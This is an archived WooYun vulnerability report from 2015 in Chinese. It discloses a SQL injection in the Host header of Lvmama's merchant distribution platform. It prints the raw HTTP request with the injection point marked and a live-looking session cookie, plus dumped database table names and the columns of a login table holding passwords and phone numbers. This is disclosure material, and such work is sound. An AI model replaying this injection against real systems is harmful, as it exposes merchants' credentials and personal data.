当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0136181

漏洞标题:驴妈妈某重要商户系统缺陷导致泄露商户信息

相关厂商:驴妈妈旅游网

漏洞作者: BMa

提交时间:2015-08-23 00:07

修复时间:2015-10-08 09:06

公开时间:2015-10-08 09:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-23: 细节已通知厂商并且等待厂商处理中
2015-08-24: 厂商已经确认,细节仅向厂商公开
2015-09-03: 细节向核心白帽子及相关领域专家公开
2015-09-13: 细节向普通白帽子公开
2015-09-23: 细节向实习白帽子公开
2015-10-08: 细节向公众公开

简要描述:

驴妈妈某重要商户系统缺陷导致泄露商户信息

详细说明:

GET / HTTP/1.1
Host: fenxiao.lvmama.com*
X-Requested-With: XMLHttpRequest
Referer: http://fenxiao.lvmama.com:80/
Cookie: JSESSIONID=fli0vCk01kra; startadd=10044; Apache=116.31.83.146.1440224292744816
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


注入点HOST
商户分销平台

1.png


2.png


3.png


4.png


漏洞证明:

Database: SAAS0
[275 tables]
+-----------------------------+
| ALITRIP_COUNTRY |
| ALITRIP_HOTEL222 |
| ALITRIP_MENPIAO_ORDER |
| ALITRIP_MENPIAO_RECEIVE |
| ALITRIP_ROOMTYPE222 |
| AUDIT_INFO |
| AUDIT_TICKET |
| B2B_SETTLE_METHOD |
| B2C_TAOBAO_CONFIG |
| B2C_TAOBAO_LOG |
| B2C_TAOBAO_NOTIFYRECEIVEMSG |
| B2C_TAOBAO_ORDER |
| B2C_TAOBAO_ORDER_LOG |
| B2C_TAOBAO_PRODUCT |
| BAIDU_TICKET_INFO |
| BAIDU_TICKET_LOG |
| BAIDU_TICKET_VIEW |
| BANK_CITYCODE |
| CM_INFO_NEWS |
| CRUEL_CODE_CUST |
| CRUEL_CODE_LIST |
| CRUEL_CODE_LOG |
| CRUEL_CODE_MESSAGE |
| CRUEL_CODE_POS |
| CRUEL_CODE_VERIFY |
| CRUEL_EXP_CODE |
| CRUEL_EXP_LIST |
| CUST_BALANCE_LOG |
| CUST_INFO_GROUP_CHANNEL |
| EXPCODE_DETAIL |
| EXPCODE_LIST |
| HOTEL_BRAND |
| HOTEL_DISTRICT |
| HOTEL_INFO |
| IMGCODE |
| INFO_AREA |
| INFO_AREA_EX |
| INFO_BANK |
| INFO_BANK_TMP |
| INFO_CAR_TYPE |
| INFO_VISA_SORT |
| INTERFACE_DIANPING_CUST |
| INTERFACE_FZG_BIZZONE |
| INTERFACE_FZG_HOTEL |
| INTERFACE_HOTEL |
| INTERFACE_HOTEL_MIKI_PW |
| INTERFACE_HOTEL_SET |
| INTERFACE_IMAGECO |
| INTERFACE_IMAGECO_CUST |
| INTERFACE_INFO |
| INTERFACE_LINE |
| INTERFACE_LLK_CODE |
| INTERFACE_LLK_CUST |
| INTERFACE_LOG |
| INTERFACE_LONG |
| INTERFACE_LUOHUSHAN_LOG |
| INTERFACE_MAP |
| INTERFACE_MEITUAN |
| INTERFACE_MTS |
| INTERFACE_MTS_LOG |
| INTERFACE_PIAOGJ |
| INTERFACE_PRICE_RULE |
| INTERFACE_QUNAR |
| INTERFACE_QUNAR_HOTEL |
| INTERFACE_QUNAR_HOTEL_LOG |
| INTERFACE_QUNAR_LINE_LOG |
| INTERFACE_QUNAR_LOG |
| INTERFACE_QUNAR_MOVE |
| INTERFACE_ROOM |
| INTERFACE_SUPPLY_SYNC_LOG |
| INTERFACE_TICKET |
| INTERFACE_USER_SET |
| INTERFACE_USER_SET_LOG |
| INTERFACE_XIECHENG_LOG |
| JP_INFO_AIRPORT |
| JP_INFO_AIRWAYS |
| JP_INFO_FLIGHT |
| JP_INFO_PLANE |
| MANAGE_T_LOG |
| MLOG$_B2B_SETTLE_METHOD |
| MLOG$_B2B_SETTLE_METHOD1 |
| MLOG$_B2B_TICKET_DETAIL |
| MLOG$_HOTEL_BRAND |
| MLOG$_HOTEL_BRAND1 |
| MLOG$_HOTEL_DISTRICT |
| MLOG$_HOTEL_DISTRICT1 |
| MLOG$_HOTEL_INFO |
| MLOG$_HOTEL_INFO1 |
| MLOG$_INFO_AREA |
| MLOG$_INFO_AREA1 |
| MLOG$_INFO_AREA_EX |
| MLOG$_INFO_AREA_EX1 |
| MLOG$_INFO_BANK |
| MLOG$_INFO_BANK1 |
| MLOG$_INFO_CAR |
| MLOG$_INFO_CONDS |
| MLOG$_INFO_HOTEL |
| MLOG$_INFO_NEWS |
| MLOG$_INFO_PROD |
| MLOG$_INFO_TICKET |
| MLOG$_INFO_TICKET_CANCEL |
| MLOG$_INFO_TICKET_COND |
| MLOG$_INFO_TICKET_DETAIL |
| MLOG$_INFO_TICKET_EX |
| MLOG$_INFO_TICKET_PRICE |
| MLOG$_INFO_TICKET_RELAREA |
| MLOG$_INFO_TICKET_RELVIEW |
| MLOG$_INFO_TRAVEL |
| MLOG$_INFO_VISA |
| MLOG$_INFO_VISA_SORT |
| MLOG$_INFO_VISA_SORT1 |
| MLOG$_INTERFACE_LLK_CUST |
| MLOG$_ROOM_INFO |
| MLOG$_SAAS_PERMISSION |
| MLOG$_SAAS_PERMISSION1 |
| MLOG$_SAAS_USER_INFO |
| MLOG$_SAAS_USER_INFO1 |
| MLOG$_TB_USR_INFO |
| MLOG$_TB_USR_INFO1 |
| MLOG$_TB_VIEW_INFO |
| MLOG$_TB_VIEW_INFO1 |
| MLOG$_USR_ENTERPRISE_TAG |
| MLOG$_USR_TAG |
| MLOG$_USR_TAG1 |
| MLOG$_USR_VIEW |
| MLOG$_USR_VIEW1 |
| ONLINE_DEBUG_LOG |
| PARENT_CUSTID_INFO |
| PLAN_TABLE |
| QUNAR_AREA_INFO |
| RECE_PAYMENT_LIST |
| ROOM_INFO |
| RUPD$_B2B_SETTLE_METHOD |
| RUPD$_B2B_SETTLE_METHOD1 |
| RUPD$_B2B_TICKET |
| RUPD$_B2B_TICKET_DETAIL |
| RUPD$_HOTEL_BRAND |
| RUPD$_HOTEL_BRAND1 |
| RUPD$_HOTEL_DISTRICT |
| RUPD$_HOTEL_DISTRICT1 |
| RUPD$_HOTEL_INFO |
| RUPD$_HOTEL_INFO1 |
| RUPD$_INFO_AREA |
| RUPD$_INFO_AREA1 |
| RUPD$_INFO_AREA_EX |
| RUPD$_INFO_AREA_EX1 |
| RUPD$_INFO_BANK |
| RUPD$_INFO_BANK1 |
| RUPD$_INFO_CAR |
| RUPD$_INFO_CONDS |
| RUPD$_INFO_HOTEL |
| RUPD$_INFO_NEWS |
| RUPD$_INFO_PROD |
| RUPD$_INFO_TICKET |
| RUPD$_INFO_TICKET_CANCEL |
| RUPD$_INFO_TICKET_COND |
| RUPD$_INFO_TICKET_DETAIL |
| RUPD$_INFO_TICKET_EX |
| RUPD$_INFO_TICKET_PRICE |
| RUPD$_INFO_TICKET_RELAREA |
| RUPD$_INFO_TICKET_RELVIEW |
| RUPD$_INFO_TRAVEL |
| RUPD$_INFO_VISA |
| RUPD$_INFO_VISA_SORT |
| RUPD$_INFO_VISA_SORT1 |
| RUPD$_INTERFACE_LLK_CUST |
| RUPD$_ROOM_INFO |
| RUPD$_SAAS_PERMISSION |
| RUPD$_SAAS_PERMISSION1 |
| RUPD$_SAAS_USER_INFO |
| RUPD$_SAAS_USER_INFO1 |
| RUPD$_TB_USR_INFO |
| RUPD$_TB_USR_INFO1 |
| RUPD$_TB_VIEW_INFO |
| RUPD$_TB_VIEW_INFO1 |
| RUPD$_USR_ENTERPRISE_TAG |
| RUPD$_USR_TAG |
| RUPD$_USR_TAG1 |
| RUPD$_USR_VIEW |
| RUPD$_USR_VIEW1 |
| SAAS_AGENT_INFO |
| SAAS_AREA_SUB |
| SAAS_BUY_LOG |
| SAAS_CLUSTER |
| SAAS_INFO_AREA |
| SAAS_INFO_SUB |
| SAAS_MESSAGE_ADDIN |
| SAAS_MESSAGE_RSS |
| SAAS_MONITORING |
| SAAS_NEWS |
| SAAS_NEWS_SORT |
| SAAS_NOTICE |
| SAAS_ORDER_CHANNEL |
| SAAS_ORDER_SOURCE |
| SAAS_PAY_DRAWMONEY |
| SAAS_PAY_DRAWMONEY_LOG |
| SAAS_PAY_PRODUCT_TYPE |
| SAAS_PAY_SERVICE |
| SAAS_PAY_SET |
| SAAS_PERMISSION |
| SAAS_PROD_TYPE |
| SAAS_SERVICE |
| SAAS_SERVICE_ADD_LOG |
| SAAS_SMS_TEMP |
| SAAS_TABLE_SQL |
| SAAS_USER_INFO |
| SAAS_USER_INFO_LOG |
| SAAS_USER_MEMO |
| SAAS_USER_PAYSET |
| SAAS_VAP_ORDER |
| SAAS_VAP_PRODUCT |
| SAAS_VIEW_SUB |
| SITE_IP2 |
| SMSINTERFACE_INFO |
| SMSINTERFACE_SET_LOG |
| SMSINTERFACE_USER_SET |
| SMS_CONSUME_LOG |
| SMS_GETMONEY_LOG |
| SYSLOG_TYPE |
| SYS_CURRENCY_RATE |
| SYS_FEE_LOG |
| SYS_MENU |
| SYS_REFER |
| SYS_REPORT_DAY |
| SYS_SMS_LOG |
| SYS_SQL_HISTORY |
| SYS_SQL_QUEUE |
| SYS_UPDATE_LOG |
| TB_CONSUME_CODE |
| TB_RECEIVE_LOG |
| TB_USR_INFO |
| TB_VIEW_INFO |
| TEMP_LTJL_AREA_INFO |
| TEMP_SYR_AREA_INFO |
| TMP_USR_VIEW |
| TOUR_GUIDE |
| T_EQUIP |
| T_EQUIPSUB |
| T_LANDMARK |
| T_MATERIA |
| T_PRO_COMMON_PRICE |
| T_PRO_DETAIL_COURSE |
| T_REGIONS |
| T_REGIONS_QD |
| T_REGIONS_SUBWAY |
| T_SPORTTYPE |
| T_VENUE |
| T_VENUE_COUNT |
| T_VENUE_PRICE |
| T_VENUE_RECORD |
| T_VENUE_SUB |
| UNIONPAY_CONFIG |
| UNIONPAY_TRADE_LOG |
| UPDATE_FOREXPRICE_LOG |
| USR_ENTERPRISE_TAG |
| USR_INFO |
| USR_LOGIN |1
| USR_MSG |
| USR_MSG_COMMENT |
| USR_MSG_MONEY |
| USR_PAGES |
| USR_POWER_AREA |
| USR_TAG |
| USR_VIEW |
| USR_VIEW_BOUNTY |
| USR_VIEW_COLUMN |
| USR_VIEW_COPY |
| USR_VIEW_LINK |
| USR_VIEW_MSG |
| USR_VIEW_MSG_HIS |
| USR_VIEW_NAV |
| USR_VIEW_PAGE |
| USR_VIEW_TEMPLATE |
| WX_SET |
| WX_TEMP_INFO |
+-----------------------------+

Database: SAAS0
Table: USR_LOGIN
[22 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| ANDROID_UID | VARCHAR2 |
| CUST_ID | NUMBER |
| DEPT_ID | NUMBER |
| DYCON | VARCHAR2 |
| DYSHOW | NUMBER |
| FAX | VARCHAR2 |
| IS_DISPRICE | NUMBER |
| IS_MANAGER | NUMBER |
| IS_VALIDATE | NUMBER |
| LAST_DATE | DATE |
| LAST_IP | VARCHAR2 |
| LOGIN_COUNT | NUMBER |
| LYT_ID | VARCHAR2 |
| MOBILE | VARCHAR2 |
| PARENT_AGENT_ID | NUMBER |
| PHONE | VARCHAR2 |
| PW | VARCHAR2 |
| ROLE_ID | NUMBER |
| ROLE_TYPE | NUMBER |
| USER_ID | VARCHAR2 |
| USER_NAME | VARCHAR2 |
| USER_PERMISSION | VARCHAR2 |
+-----------------+----------+

修复方案:

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-08-24 09:04

厂商回复:

谢谢

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-23 09:42 | sm0nk ( 普通白帽子 | Rank:174 漏洞数:30 | all is well)

    6